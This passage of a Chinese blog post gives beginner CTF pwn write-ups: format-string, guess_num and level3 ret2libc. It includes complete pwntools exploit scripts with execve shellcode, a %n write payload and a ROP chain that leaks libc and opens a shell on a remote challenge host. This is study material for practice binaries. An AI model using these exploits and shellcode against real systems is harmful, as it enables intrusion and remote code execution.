passwd:"</span>,payload)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure></p>
<h2 id=""><a href="#" class="headerlink" title=""></a><img src="/2019/08/17/攻防世界-新手/int_overflow-flag.GIF" alt="checksec"></h2><h1 id="string"><a href="#string" class="headerlink" title="string"></a>string</h1><p><img src="/2019/08/17/攻防世界-新手/string-1.GIF" alt="checksec"></p>
<p>找突破口<br><img src="/2019/08/17/攻防世界-新手/string-3.GIF" alt="checksec"><br>执行这条语句的条件是*a1 == a1[1]，a1为传入的参数，<br>回溯发现a1即sub_400D72函数传入的v4，而v4 = (__int64)v3，其中</p>
<p><img src="/2019/08/17/攻防世界-新手/string-4.GIF" alt="checksec"><br>*v3 = 68;   #即v3[0] = 68;<br>v3[1] = 85;</p>
<p>也就是说要使a1 == a1[1]，则需要v3 == v3[1]。</p>
<p>还有可以利用的代码<br><img src="/2019/08/17/攻防世界-新手/string-2.GIF" alt="checksec"></p>
<p>通过这个格式化字符串漏洞，我们可以令v3的值等于v3【1】从而满足if 的条件进入<br><img src="/2019/08/17/攻防世界-新手/string-5.GIF" alt="checksec"><br>题目已经告诉我们v4的地址了。那我们修改v4的值就好了<br>之后我们想清楚逻辑关系，写exp</p>
<p>补充：<br>strcmp函数是string compare(字符串比较)的缩写，用于比较两个字符串并根据比较结果返回整数。基本形式为strcmp(str1,str2)，若str1=str2，则返回零；若str1&lt;str2，则返回负数；若str1&gt;str2，则返回正数。 [1-2]<br>通过逻辑关系知道，我们前面分别要输入east和1达到sub_400BB9函数。也就是格式化字符串漏洞那里<br><img src="/2019/08/17/攻防世界-新手/string-6.GIF" alt="checksec"></p>
<p>v3addr = int(p.recvuntil(“\n”),16) #获取v3地址，后16<br>寻找格式化字符串的位置</p>
<p>我们先是  <code>puts(&quot;&#39;Give me an address&#39;&quot;);</code>这行后面输了个5，然后再<code>puts(&quot;And, you wish is:&quot;);</code>这后面输了AAAAAAAA%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.<br><img src="/2019/08/17/攻防世界-新手/string-7.GIF" alt="checksec"><br><img src="/2019/08/17/攻防世界-新手/string-8.GIF" alt="checksec"><br>可以知道我们两次输入的地方分别在7，8这两个位置。如果我们把地址放在7这里，那就写$7n;如果是后面输入的地方，那就写$8n.<br>可以写exp了<br><figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#-*-coding:utf-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level=<span class="string">"debug"</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#p = process('./string')</span></span><br><span class="line">p = remote(<span class="string">"111.198.29.45"</span>,<span class="string">"56536"</span>)</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">"secret[0] is "</span>) </span><br><span class="line">addr = int(p.recvuntil(<span class="string">"\n"</span>),<span class="number">16</span>) <span class="comment">#v3地址</span></span><br><span class="line">log.success(<span class="string">"addr:"</span>+hex(addr))</span><br><span class="line">p.sendlineafter(<span class="string">"be:\n"</span>,<span class="string">"LH"</span>) </span><br><span class="line">p.sendlineafter(<span class="string">"up?:\n"</span>,<span class="string">"east"</span>) </span><br><span class="line">p.sendlineafter(<span class="string">"leave(0)?:\n"</span>,<span class="string">"1"</span>)</span><br><span class="line"><span class="comment">##前面都为逻辑关系，现在进入关键部分</span></span><br><span class="line">p.sendlineafter(<span class="string">"address\'\n"</span>, str(addr))</span><br><span class="line">p.sendlineafter(<span class="string">"is:\n"</span>, <span class="string">"%85c%7$n"</span>)  <span class="comment">##将addr所指向的v3，改写成85</span></span><br><span class="line">shellcode=<span class="string">"\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x57\x54\x5e\x0f\x05"</span> </span><br><span class="line">p.sendlineafter(<span class="string">"SPELL\n"</span>,shellcode) </span><br><span class="line"></span><br><span class="line"></span><br><span class="line">p.interactive()</span><br><span class="line">p.close()</span><br></pre></td></tr></table></figure></p>
<p>至于将地址和字符串写在同一个print漏洞函数这个办法，我没成功，在组合payload的时候报错。</p>
<p>参考文章：<a href="https://www.jianshu.com/p/457520f97a76" target="_blank" rel="noopener">https://www.jianshu.com/p/457520f97a76</a></p>
<hr>
<h1 id="gues-number"><a href="#gues-number" class="headerlink" title="gues_number"></a>gues_number</h1><h2 id="解题-1"><a href="#解题-1" class="headerlink" title="解题"></a>解题</h2><p><img src="/2019/08/17/攻防世界-新手/guess_num-1.GIF" alt=""><br>这题好像开的挺多<br>看下代码，发现只要连续猜对10次v7取的随机数，就拿到flag了。这里的突破口应该是在rand，seed这样的伪随机数上。<br><img src="/2019/08/17/攻防世界-新手/guess_num-2.GIF" alt=""><br>这里存在一个gets漏洞函数，可以利用溢出。但是题目有candy和NX所以，不能直接栈溢出到sub_C3E函数</p>
<p>查看地址</p>
<p><img src="/2019/08/17/攻防世界-新手/guess_num-3.GIF" alt=""><br>可以看到v7和seed的地址是连续的，差20h<br>用v7覆盖掉seed来控制随机数。<br>理一下思路，利用v7覆盖seed[0],使seed[0]已知，然后循环，然后直接拿flag就好了</p>
<h2 id="关于rand和srand"><a href="#关于rand和srand" class="headerlink" title="关于rand和srand"></a>关于rand和srand</h2><p>随机函数生成的随机数并不是真的随机数，他们只是在一定范围内随机，实际上是一段数字的循环，这些数字取决于随机种子。在调用rand()函数时，必须先利用srand()设好随机数种子，如果未设随机数种子，rand()在调用时会自动设随机数种子为1。<br>对于该题目，我们将随机种子设置为0或1都可，参考文件中的循环来写脚本。</p>
<h2 id="关于ctype库与dll"><a href="#关于ctype库与dll" class="headerlink" title="关于ctype库与dll"></a>关于ctype库与dll</h2><p>我们使用python标准库中自带的ctypes模块进行python和c的混合编程</p>
<h2 id="libc共享库"><a href="#libc共享库" class="headerlink" title="libc共享库"></a>libc共享库</h2><p>可以使用ldd查找<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">linhua@linhua-virtual-machine:~/桌面/攻防世界/guess_nume$ ldd guess_num</span><br><span class="line">    linux-vdso.so.1 (0x00007fffaf6de000)</span><br><span class="line">    libc.so.6 =&gt; /lib/x86_64-linux-gnu/libc.so.6 (0x00007f9acf1ca000)</span><br><span class="line">    /lib64/ld-linux-x86-64.so.2 (0x00007f9acf7be000)</span><br></pre></td></tr></table></figure></p>
<p>也可以在脚本中通过elf文件查找<br>elf = ELF(‘./guess_num’)<br>libc = elf.libc</p>
<p><img src="/2019/08/17/攻防世界-新手/guess_num-1.GIF" alt=""></p>
<p>参考：<br>链接：<a href="https://www.jianshu.com/p/0bc6c65addfd" target="_blank" rel="noopener">https://www.jianshu.com/p/0bc6c65addfd</a></p>
<hr>
<h1 id="level3"><a href="#level3" class="headerlink" title="level3"></a>level3</h1><p><img src="/2019/08/17/攻防世界-新手/level3-1.GIF" alt=""><br>32位</p>
<p>题目的代码很简洁，主要就两行<br>也没有system函数，和其他获取falg的函数。应该是要用其他的函数，来间接获取的system的地址。<br>read函数这里可以溢出，</p>
<p>参考<a href="https://www.jianshu.com/p/4b3fd7328f20" target="_blank" rel="noopener">https://www.jianshu.com/p/4b3fd7328f20</a></p>
<h2 id="思路分析"><a href="#思路分析" class="headerlink" title="思路分析"></a>思路分析</h2><p>无libc文件，无sys函数，无binsh字符串，有read和write函数，很明显的<strong>ret2libc</strong><br>原理：system 函数属于 libc，而 libc.so 动态链接库中的函数之间相对偏移是固定的。即使程序有 ASLR 保护，也只是针对于地址中间位进行随机，最低的 12 位并不会发生改变。用工具来找到对应的libc文件</p>
<p>具体思路：<br>第一次溢出返回到write函数执行write(1,write_got,4)得到write的真实地址，计算得到system跟”/bin/sh”的真实地址，然后再返回到vulnerable_function函数，第二次回到溢出点，覆盖返回地址到system执行system(“/bin/sh”)</p>
<p>exp<br><figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding:utf-8 -*-  </span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> LibcSearcher</span><br><span class="line">p=remote(<span class="string">"111.198.29.45"</span>,<span class="number">44145</span>)</span><br><span class="line">elf = ELF(<span class="string">"./level3"</span>)</span><br><span class="line">plt_write = elf.symbols[<span class="string">'write'</span>]</span><br><span class="line">plt_read = elf.symbols[<span class="string">'read'</span>]</span><br><span class="line">got_write = elf.got[<span class="string">'write'</span>]</span><br><span class="line">vul_func = <span class="number">0x0804844b</span> <span class="comment">#这里用main_addr = elf.symbols['main'] 返回主函数也是可以滴</span></span><br><span class="line">payload = <span class="string">'A'</span> * <span class="number">140</span> + p32(plt_write) + p32(vul_func) + p32(<span class="number">1</span>) + p32(got_write) + p32(<span class="number">4</span>)</span><br><span class="line">p.recvuntil(<span class="string">'Input:\n'</span>)<span class="comment">#这句千万不能漏了，逻辑出问题就会执行不了，这句的意思就是调用执行嘛，然后就把payload写进去就可以达到目的哟</span></span><br><span class="line">p.send(payload)</span><br><span class="line">write_addr = u32(p.recv(<span class="number">4</span>))</span><br><span class="line"><span class="keyword">print</span> hex(write_addr)</span><br><span class="line"></span><br><span class="line">libc = LibcSearcher(<span class="string">'write'</span>, write_addr)</span><br><span class="line">offset = write_addr - libc.dump(<span class="string">'write'</span>)  <span class="comment">##感觉这个就像是libc_base，libc的基地址，我这么理解的</span></span><br><span class="line">system_addr = offset + libc.dump(<span class="string">'system'</span>)</span><br><span class="line">binsh_addr = offset + libc.dump(<span class="string">'str_bin_sh'</span>)</span><br><span class="line">payload1 = <span class="string">'a'</span> * <span class="number">140</span> + p32(system_addr) + p32(plt_read) + p32(binsh_addr)</span><br><span class="line">p.recvuntil(<span class="string">'Input:\n'</span>)</span><br><span class="line">p.send(payload1)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure></p>

      
    </div>

    

    
    
    

    

    
      
    
    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/08/14/pwn解题/" rel="next" title="pwn解题">
                <i class="fa fa-chevron-left"></i> pwn解题
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/08/17/攻防世界-新手/" rel="prev" title="">
                 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>


  </div>


          </div>
          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Inhaltsverzeichnis
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Übersicht
          </li>
        </ul>
      

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">lh</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">86</span>
                    <span class="site-state-item-name">Artikel</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-categories">
                  <a href="/categories/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">11</span>
                    <span class="site-state-item-name">Kategorien</span>
                  </a>
                </div>
              

              
            </nav>
          

          

          

          

          
          

          
            
          
          

        </div>
      </div>

      
      <!--noindex-->
        <div class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
            
            
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#get-shell"><span class="nav-number">1.</span> <span class="nav-text">get_shell</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#level2-NX-ROP入门"><span class="nav-number">2.</span> <span class="nav-text">level2 (NX-ROP入门)</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#解题"><span class="nav-number">2.1.</span> <span class="nav-text">解题</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#exp"><span class="nav-number">2.2.</span> <span class="nav-text">exp</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#l2-py"><span class="nav-number">2.2.1.</span> <span class="nav-text">l2.py</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level2-py"><span class="nav-number">2.2.2.</span> <span class="nav-text">level2.py</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#补充：无-bin-sh"><span class="nav-number">2.3.</span> <span class="nav-text">补充：无/bin/sh</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#level0"><span class="nav-number">3.</span> <span class="nav-text">level0</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#hello-pwn"><span class="nav-number">4.</span> <span class="nav-text">hello_pwn</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#born"><span class="nav-number">5.</span> <span class="nav-text">born</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#CGfsb"><span class="nav-number">6.</span> <span class="nav-text">CGfsb</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#CGpwn2"><span class="nav-number">7.</span> <span class="nav-text">CGpwn2</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#int-overflow"><span class="nav-number">8.</span> <span class="nav-text">int_overflow</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#"><span class="nav-number">8.1.</span> <span class="nav-text"></span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#string"><span class="nav-number">9.</span> <span class="nav-text">string</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#gues-number"><span class="nav-number">10.</span> <span class="nav-text">gues_number</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#解题-1"><span class="nav-number">10.1.</span> <span class="nav-text">解题</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#关于rand和srand"><span class="nav-number">10.2.</span> <span class="nav-text">关于rand和srand</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#关于ctype库与dll"><span class="nav-number">10.3.</span> <span class="nav-text">关于ctype库与dll</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#libc共享库"><span class="nav-number">10.4.</span> <span class="nav-text">libc共享库</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#level3"><span class="nav-number">11.</span> <span class="nav-text">level3</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#思路分析"><span class="nav-number">11.1.</span> <span class="nav-text">思路分析</span></a></li></ol></li></ol></div>
            

          </div>
        </div>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">lh</span>

  

  
</div>


  <div class="powered-by">Erstellt mit  <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> v3.8.0</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme – <a href="https://theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Pisces</a> v6.7.0</div>




        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv" title="Total Visitors">
      <i class="fa fa-user"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
    </span>
  

  
    <span class="site-pv" title="Total Views">
      <i class="fa fa-eye"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
    </span>
  
</div>









        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

    

    
  </div>

  

<script>
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>


























  
  <script src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>


  


  <script src="/js/src/utils.js?v=6.7.0"></script>

  <script src="/js/src/motion.js?v=6.7.0"></script>



  
  


  <script src="/js/src/affix.js?v=6.7.0"></script>

  <script src="/js/src/schemes/pisces.js?v=6.7.0"></script>



  
  <script src="/js/src/scrollspy.js?v=6.7.0"></script>
<script src="/js/src/post-details.js?v=6.7.0"></script>



  


  <script src="/js/src/bootstrap.js?v=6.7.0"></script>



  



  











  





  

  

  

  

  

  

  

  

  

  

  

  

  

</body>
</html>
